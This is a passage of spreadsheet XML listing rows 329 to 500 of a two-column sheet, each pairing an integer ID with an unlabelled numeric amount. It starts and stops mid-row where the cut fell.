        <v>107000</v>
      </c>
    </row>
    <row r="329" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A329">
        <v>940</v>
      </c>
      <c r="B329" s="8">
        <v>250</v>
      </c>
    </row>
    <row r="330" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A330">
        <v>943</v>
      </c>
      <c r="B330" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="331" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A331">
        <v>946</v>
      </c>
      <c r="B331" s="8">
        <v>393000</v>
      </c>
    </row>
    <row r="332" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A332">
        <v>949</v>
      </c>
      <c r="B332" s="8">
        <v>21460000</v>
      </c>
    </row>
    <row r="333" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A333">
        <v>950</v>
      </c>
      <c r="B333" s="8">
        <v>660000</v>
      </c>
    </row>
    <row r="334" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A334">
        <v>953</v>
      </c>
      <c r="B334" s="8">
        <v>9500</v>
      </c>
    </row>
    <row r="335" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A335">
        <v>954</v>
      </c>
      <c r="B335" s="8">
        <v>200400</v>
      </c>
    </row>
    <row r="336" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A336">
        <v>958</v>
      </c>
      <c r="B336" s="8">
        <v>1327345.23</v>
      </c>
    </row>
    <row r="337" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A337">
        <v>959</v>
      </c>
      <c r="B337" s="8">
        <v>130000</v>
      </c>
    </row>
    <row r="338" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A338">
        <v>963</v>
      </c>
      <c r="B338" s="8">
        <v>482</v>
      </c>
    </row>
    <row r="339" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A339">
        <v>965</v>
      </c>
      <c r="B339" s="8">
        <v>171910</v>
      </c>
    </row>
    <row r="340" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A340">
        <v>966</v>
      </c>
      <c r="B340" s="8">
        <v>2961935</v>
      </c>
    </row>
    <row r="341" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A341">
        <v>974</v>
      </c>
      <c r="B341" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="342" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A342">
        <v>976</v>
      </c>
      <c r="B342" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="343" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A343">
        <v>979</v>
      </c>
      <c r="B343" s="8">
        <v>159600</v>
      </c>
    </row>
    <row r="344" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A344">
        <v>984</v>
      </c>
      <c r="B344" s="8">
        <v>45000</v>
      </c>
    </row>
    <row r="345" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A345">
        <v>985</v>
      </c>
      <c r="B345" s="8">
        <v>100250</v>
      </c>
    </row>
    <row r="346" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A346">
        <v>990</v>
      </c>
      <c r="B346" s="8">
        <v>625000</v>
      </c>
    </row>
    <row r="347" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A347">
        <v>992</v>
      </c>
      <c r="B347" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="348" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A348">
        <v>993</v>
      </c>
      <c r="B348" s="8">
        <v>257000</v>
      </c>
    </row>
    <row r="349" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A349">
        <v>998</v>
      </c>
      <c r="B349" s="8">
        <v>3000000</v>
      </c>
    </row>
    <row r="350" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A350">
        <v>999</v>
      </c>
      <c r="B350" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="351" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A351">
        <v>1000</v>
      </c>
      <c r="B351" s="8">
        <v>1367400</v>
      </c>
    </row>
    <row r="352" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A352">
        <v>1003</v>
      </c>
      <c r="B352" s="8">
        <v>900</v>
      </c>
    </row>
    <row r="353" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A353">
        <v>1012</v>
      </c>
      <c r="B353" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="354" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A354">
        <v>1025</v>
      </c>
      <c r="B354" s="8">
        <v>3220</v>
      </c>
    </row>
    <row r="355" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A355">
        <v>1026</v>
      </c>
      <c r="B355" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A356">
        <v>1028</v>
      </c>
      <c r="B356" s="8">
        <v>870000</v>
      </c>
    </row>
    <row r="357" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A357">
        <v>1029</v>
      </c>
      <c r="B357" s="8">
        <v>13000</v>
      </c>
    </row>
    <row r="358" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A358">
        <v>1033</v>
      </c>
      <c r="B358" s="8">
        <v>2950000</v>
      </c>
    </row>
    <row r="359" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A359">
        <v>1034</v>
      </c>
      <c r="B359" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="360" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A360">
        <v>1035</v>
      </c>
      <c r="B360" s="8">
        <v>18720000</v>
      </c>
    </row>
    <row r="361" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A361">
        <v>1048</v>
      </c>
      <c r="B361" s="8">
        <v>812700</v>
      </c>
    </row>
    <row r="362" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A362">
        <v>1051</v>
      </c>
      <c r="B362" s="8">
        <v>103000</v>
      </c>
    </row>
    <row r="363" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A363">
        <v>1052</v>
      </c>
      <c r="B363" s="8">
        <v>21710</v>
      </c>
    </row>
    <row r="364" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A364">
        <v>1054</v>
      </c>
      <c r="B364" s="8">
        <v>33000</v>
      </c>
    </row>
    <row r="365" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A365">
        <v>1057</v>
      </c>
      <c r="B365" s="8">
        <v>1850000</v>
      </c>
    </row>
    <row r="366" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A366">
        <v>1061</v>
      </c>
      <c r="B366" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="367" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A367">
        <v>1068</v>
      </c>
      <c r="B367" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="368" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A368">
        <v>1069</v>
      </c>
      <c r="B368" s="8">
        <v>18000</v>
      </c>
    </row>
    <row r="369" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A369">
        <v>1070</v>
      </c>
      <c r="B369" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="370" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A370">
        <v>1072</v>
      </c>
      <c r="B370" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="371" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A371">
        <v>1078</v>
      </c>
      <c r="B371" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="372" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A372">
        <v>1083</v>
      </c>
      <c r="B372" s="8">
        <v>587500</v>
      </c>
    </row>
    <row r="373" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A373">
        <v>1087</v>
      </c>
      <c r="B373" s="8">
        <v>2140000</v>
      </c>
    </row>
    <row r="374" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A374">
        <v>1097</v>
      </c>
      <c r="B374" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="375" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A375">
        <v>1098</v>
      </c>
      <c r="B375" s="8">
        <v>980000</v>
      </c>
    </row>
    <row r="376" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A376">
        <v>1102</v>
      </c>
      <c r="B376" s="8">
        <v>620000</v>
      </c>
    </row>
    <row r="377" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A377">
        <v>1107</v>
      </c>
      <c r="B377" s="8">
        <v>1675000</v>
      </c>
    </row>
    <row r="378" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A378">
        <v>1113</v>
      </c>
      <c r="B378" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="379" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A379">
        <v>1116</v>
      </c>
      <c r="B379" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="380" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A380">
        <v>1117</v>
      </c>
      <c r="B380" s="8">
        <v>74500</v>
      </c>
    </row>
    <row r="381" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A381">
        <v>1123</v>
      </c>
      <c r="B381" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="382" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A382">
        <v>1124</v>
      </c>
      <c r="B382" s="8">
        <v>2400000</v>
      </c>
    </row>
    <row r="383" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A383">
        <v>1125</v>
      </c>
      <c r="B383" s="8">
        <v>60000000</v>
      </c>
    </row>
    <row r="384" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A384">
        <v>1126</v>
      </c>
      <c r="B384" s="8">
        <v>725000</v>
      </c>
    </row>
    <row r="385" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A385">
        <v>1127</v>
      </c>
      <c r="B385" s="8">
        <v>553000</v>
      </c>
    </row>
    <row r="386" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A386">
        <v>1129</v>
      </c>
      <c r="B386" s="8">
        <v>850000</v>
      </c>
    </row>
    <row r="387" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A387">
        <v>1130</v>
      </c>
      <c r="B387" s="8">
        <v>6324000</v>
      </c>
    </row>
    <row r="388" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A388">
        <v>1131</v>
      </c>
      <c r="B388" s="8">
        <v>312000</v>
      </c>
    </row>
    <row r="389" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A389">
        <v>1132</v>
      </c>
      <c r="B389" s="8">
        <v>11400000</v>
      </c>
    </row>
    <row r="390" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A390">
        <v>1134</v>
      </c>
      <c r="B390" s="8">
        <v>3400000</v>
      </c>
    </row>
    <row r="391" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A391">
        <v>1141</v>
      </c>
      <c r="B391" s="8">
        <v>4125000</v>
      </c>
    </row>
    <row r="392" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A392">
        <v>1142</v>
      </c>
      <c r="B392" s="8">
        <v>2021358</v>
      </c>
    </row>
    <row r="393" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A393">
        <v>1143</v>
      </c>
      <c r="B393" s="8">
        <v>15000</v>
      </c>
    </row>
    <row r="394" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A394">
        <v>1144</v>
      </c>
      <c r="B394" s="8">
        <v>62000</v>
      </c>
    </row>
    <row r="395" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A395">
        <v>1149</v>
      </c>
      <c r="B395" s="8">
        <v>256200</v>
      </c>
    </row>
    <row r="396" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A396">
        <v>1155</v>
      </c>
      <c r="B396" s="8">
        <v>4390159.5</v>
      </c>
    </row>
    <row r="397" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A397">
        <v>1156</v>
      </c>
      <c r="B397" s="8">
        <v>4968753.78</v>
      </c>
    </row>
    <row r="398" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A398">
        <v>1157</v>
      </c>
      <c r="B398" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="399" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A399">
        <v>1159</v>
      </c>
      <c r="B399" s="8">
        <v>410000</v>
      </c>
    </row>
    <row r="400" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A400">
        <v>1160</v>
      </c>
      <c r="B400" s="8">
        <v>5665000</v>
      </c>
    </row>
    <row r="401" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A401">
        <v>1161</v>
      </c>
      <c r="B401" s="8">
        <v>1100000</v>
      </c>
    </row>
    <row r="402" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A402">
        <v>1162</v>
      </c>
      <c r="B402" s="8">
        <v>10000000</v>
      </c>
    </row>
    <row r="403" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A403">
        <v>1165</v>
      </c>
      <c r="B403" s="8">
        <v>9000000</v>
      </c>
    </row>
    <row r="404" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A404">
        <v>1166</v>
      </c>
      <c r="B404" s="8">
        <v>9000000</v>
      </c>
    </row>
    <row r="405" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A405">
        <v>1170</v>
      </c>
      <c r="B405" s="8">
        <v>1000200</v>
      </c>
    </row>
    <row r="406" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A406">
        <v>1175</v>
      </c>
      <c r="B406" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="407" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A407">
        <v>1177</v>
      </c>
      <c r="B407" s="8">
        <v>115000</v>
      </c>
    </row>
    <row r="408" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A408">
        <v>1178</v>
      </c>
      <c r="B408" s="8">
        <v>156500</v>
      </c>
    </row>
    <row r="409" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A409">
        <v>1182</v>
      </c>
      <c r="B409" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="410" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A410">
        <v>1183</v>
      </c>
      <c r="B410" s="8">
        <v>8500</v>
      </c>
    </row>
    <row r="411" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A411">
        <v>1190</v>
      </c>
      <c r="B411" s="8">
        <v>601500</v>
      </c>
    </row>
    <row r="412" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A412">
        <v>1192</v>
      </c>
      <c r="B412" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="413" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A413">
        <v>1195</v>
      </c>
      <c r="B413" s="8">
        <v>302000</v>
      </c>
    </row>
    <row r="414" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A414">
        <v>1197</v>
      </c>
      <c r="B414" s="8">
        <v>185000</v>
      </c>
    </row>
    <row r="415" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A415">
        <v>1198</v>
      </c>
      <c r="B415" s="8">
        <v>255000</v>
      </c>
    </row>
    <row r="416" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A416">
        <v>1199</v>
      </c>
      <c r="B416" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="417" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A417">
        <v>1200</v>
      </c>
      <c r="B417" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="418" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A418">
        <v>1202</v>
      </c>
      <c r="B418" s="8">
        <v>120100</v>
      </c>
    </row>
    <row r="419" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A419">
        <v>1206</v>
      </c>
      <c r="B419" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="420" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A420">
        <v>1210</v>
      </c>
      <c r="B420" s="8">
        <v>5000000</v>
      </c>
    </row>
    <row r="421" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A421">
        <v>1211</v>
      </c>
      <c r="B421" s="8">
        <v>390000</v>
      </c>
    </row>
    <row r="422" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A422">
        <v>1215</v>
      </c>
      <c r="B422" s="8">
        <v>170000</v>
      </c>
    </row>
    <row r="423" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A423">
        <v>1216</v>
      </c>
      <c r="B423" s="8">
        <v>2700000</v>
      </c>
    </row>
    <row r="424" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A424">
        <v>1222</v>
      </c>
      <c r="B424" s="8">
        <v>1640000</v>
      </c>
    </row>
    <row r="425" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A425">
        <v>1223</v>
      </c>
      <c r="B425" s="8">
        <v>127000</v>
      </c>
    </row>
    <row r="426" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A426">
        <v>1224</v>
      </c>
      <c r="B426" s="8">
        <v>620000</v>
      </c>
    </row>
    <row r="427" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A427">
        <v>1229</v>
      </c>
      <c r="B427" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="428" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A428">
        <v>1230</v>
      </c>
      <c r="B428" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="429" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A429">
        <v>1232</v>
      </c>
      <c r="B429" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="430" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A430">
        <v>1234</v>
      </c>
      <c r="B430" s="8">
        <v>615000</v>
      </c>
    </row>
    <row r="431" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A431">
        <v>1237</v>
      </c>
      <c r="B431" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="432" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A432">
        <v>1238</v>
      </c>
      <c r="B432" s="8">
        <v>3320000</v>
      </c>
    </row>
    <row r="433" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A433">
        <v>1240</v>
      </c>
      <c r="B433" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="434" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A434">
        <v>1245</v>
      </c>
      <c r="B434" s="8">
        <v>4000</v>
      </c>
    </row>
    <row r="435" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A435">
        <v>1246</v>
      </c>
      <c r="B435" s="8">
        <v>12000000</v>
      </c>
    </row>
    <row r="436" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A436">
        <v>1248</v>
      </c>
      <c r="B436" s="8">
        <v>15079500</v>
      </c>
    </row>
    <row r="437" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A437">
        <v>1249</v>
      </c>
      <c r="B437" s="8">
        <v>70200</v>
      </c>
    </row>
    <row r="438" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A438">
        <v>1256</v>
      </c>
      <c r="B438" s="8">
        <v>495000</v>
      </c>
    </row>
    <row r="439" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A439">
        <v>1257</v>
      </c>
      <c r="B439" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="440" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A440">
        <v>1262</v>
      </c>
      <c r="B440" s="8">
        <v>1400</v>
      </c>
    </row>
    <row r="441" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A441">
        <v>1265</v>
      </c>
      <c r="B441" s="8">
        <v>12637313.18</v>
      </c>
    </row>
    <row r="442" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A442">
        <v>1266</v>
      </c>
      <c r="B442" s="8">
        <v>1150000</v>
      </c>
    </row>
    <row r="443" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A443">
        <v>1270</v>
      </c>
      <c r="B443" s="8">
        <v>1000200</v>
      </c>
    </row>
    <row r="444" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A444">
        <v>1272</v>
      </c>
      <c r="B444" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="445" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A445">
        <v>1274</v>
      </c>
      <c r="B445" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="446" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A446">
        <v>1275</v>
      </c>
      <c r="B446" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="447" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A447">
        <v>1277</v>
      </c>
      <c r="B447" s="8">
        <v>57000</v>
      </c>
    </row>
    <row r="448" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A448">
        <v>1278</v>
      </c>
      <c r="B448" s="8">
        <v>36400000</v>
      </c>
    </row>
    <row r="449" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A449">
        <v>1285</v>
      </c>
      <c r="B449" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="450" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A450">
        <v>1287</v>
      </c>
      <c r="B450" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="451" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A451">
        <v>1290</v>
      </c>
      <c r="B451" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="452" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A452">
        <v>1295</v>
      </c>
      <c r="B452" s="8">
        <v>680000</v>
      </c>
    </row>
    <row r="453" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A453">
        <v>1296</v>
      </c>
      <c r="B453" s="8">
        <v>4320</v>
      </c>
    </row>
    <row r="454" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A454">
        <v>1300</v>
      </c>
      <c r="B454" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="455" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A455">
        <v>1302</v>
      </c>
      <c r="B455" s="8">
        <v>3300</v>
      </c>
    </row>
    <row r="456" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A456">
        <v>1304</v>
      </c>
      <c r="B456" s="8">
        <v>960000</v>
      </c>
    </row>
    <row r="457" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A457">
        <v>1307</v>
      </c>
      <c r="B457" s="8">
        <v>140000</v>
      </c>
    </row>
    <row r="458" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A458">
        <v>1308</v>
      </c>
      <c r="B458" s="8">
        <v>5030000</v>
      </c>
    </row>
    <row r="459" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A459">
        <v>1310</v>
      </c>
      <c r="B459" s="8">
        <v>5740000</v>
      </c>
    </row>
    <row r="460" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A460">
        <v>1311</v>
      </c>
      <c r="B460" s="8">
        <v>550000</v>
      </c>
    </row>
    <row r="461" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A461">
        <v>1312</v>
      </c>
      <c r="B461" s="8">
        <v>1600000</v>
      </c>
    </row>
    <row r="462" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A462">
        <v>1318</v>
      </c>
      <c r="B462" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="463" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A463">
        <v>1321</v>
      </c>
      <c r="B463" s="8">
        <v>60</v>
      </c>
    </row>
    <row r="464" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A464">
        <v>1324</v>
      </c>
      <c r="B464" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="465" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A465">
        <v>1326</v>
      </c>
      <c r="B465" s="8">
        <v>540000</v>
      </c>
    </row>
    <row r="466" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A466">
        <v>1327</v>
      </c>
      <c r="B466" s="8">
        <v>1044000</v>
      </c>
    </row>
    <row r="467" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A467">
        <v>1337</v>
      </c>
      <c r="B467" s="8">
        <v>1050000</v>
      </c>
    </row>
    <row r="468" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A468">
        <v>1341</v>
      </c>
      <c r="B468" s="8">
        <v>1500</v>
      </c>
    </row>
    <row r="469" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A469">
        <v>1344</v>
      </c>
      <c r="B469" s="8">
        <v>46000</v>
      </c>
    </row>
    <row r="470" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A470">
        <v>1347</v>
      </c>
      <c r="B470" s="8">
        <v>1300000</v>
      </c>
    </row>
    <row r="471" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A471">
        <v>1348</v>
      </c>
      <c r="B471" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="472" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A472">
        <v>1352</v>
      </c>
      <c r="B472" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="473" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A473">
        <v>1353</v>
      </c>
      <c r="B473" s="8">
        <v>395000</v>
      </c>
    </row>
    <row r="474" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A474">
        <v>1361</v>
      </c>
      <c r="B474" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="475" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A475">
        <v>1363</v>
      </c>
      <c r="B475" s="8">
        <v>195270.85</v>
      </c>
    </row>
    <row r="476" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A476">
        <v>1365</v>
      </c>
      <c r="B476" s="8">
        <v>1310000</v>
      </c>
    </row>
    <row r="477" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A477">
        <v>1367</v>
      </c>
      <c r="B477" s="8">
        <v>134000</v>
      </c>
    </row>
    <row r="478" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A478">
        <v>1369</v>
      </c>
      <c r="B478" s="8">
        <v>720</v>
      </c>
    </row>
    <row r="479" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A479">
        <v>1375</v>
      </c>
      <c r="B479" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="480" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A480">
        <v>1379</v>
      </c>
      <c r="B480" s="8">
        <v>130000000</v>
      </c>
    </row>
    <row r="481" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A481">
        <v>1380</v>
      </c>
      <c r="B481" s="8">
        <v>1260</v>
      </c>
    </row>
    <row r="482" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A482">
        <v>1381</v>
      </c>
      <c r="B482" s="8">
        <v>25100</v>
      </c>
    </row>
    <row r="483" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A483">
        <v>1384</v>
      </c>
      <c r="B483" s="8">
        <v>15349390</v>
      </c>
    </row>
    <row r="484" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A484">
        <v>1385</v>
      </c>
      <c r="B484" s="8">
        <v>130000</v>
      </c>
    </row>
    <row r="485" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A485">
        <v>1386</v>
      </c>
      <c r="B485" s="8">
        <v>191460</v>
      </c>
    </row>
    <row r="486" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A486">
        <v>1388</v>
      </c>
      <c r="B486" s="8">
        <v>3600000</v>
      </c>
    </row>
    <row r="487" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A487">
        <v>1391</v>
      </c>
      <c r="B487" s="8">
        <v>8000</v>
      </c>
    </row>
    <row r="488" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A488">
        <v>1393</v>
      </c>
      <c r="B488" s="8">
        <v>1750000</v>
      </c>
    </row>
    <row r="489" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A489">
        <v>1397</v>
      </c>
      <c r="B489" s="8">
        <v>58310</v>
      </c>
    </row>
    <row r="490" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A490">
        <v>1398</v>
      </c>
      <c r="B490" s="8">
        <v>96040</v>
      </c>
    </row>
    <row r="491" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A491">
        <v>1399</v>
      </c>
      <c r="B491" s="8">
        <v>278450</v>
      </c>
    </row>
    <row r="492" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A492">
        <v>1400</v>
      </c>
      <c r="B492" s="8">
        <v>784382</v>
      </c>
    </row>
    <row r="493" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A493">
        <v>1402</v>
      </c>
      <c r="B493" s="8">
        <v>3480</v>
      </c>
    </row>
    <row r="494" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A494">
        <v>1404</v>
      </c>
      <c r="B494" s="8">
        <v>4000000</v>
      </c>
    </row>
    <row r="495" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A495">
        <v>1405</v>
      </c>
      <c r="B495" s="8">
        <v>403000</v>
      </c>
    </row>
    <row r="496" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A496">
        <v>1406</v>
      </c>
      <c r="B496" s="8">
        <v>427200</v>
      </c>
    </row>
    <row r="497" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A497">
        <v>1407</v>
      </c>
      <c r="B497" s="8">
        <v>50</v>
      </c>
    </row>
    <row r="498" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A498">
        <v>1408</v>
      </c>
      <c r="B498" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="499" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A499">
        <v>1414</v>
      </c>
      <c r="B499" s="8">
        <v>5810000</v>
      </c>
    </row>
    <row r="500" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A500">
        <v>1417</v>
      </c>
      <c r="B500" s="8">
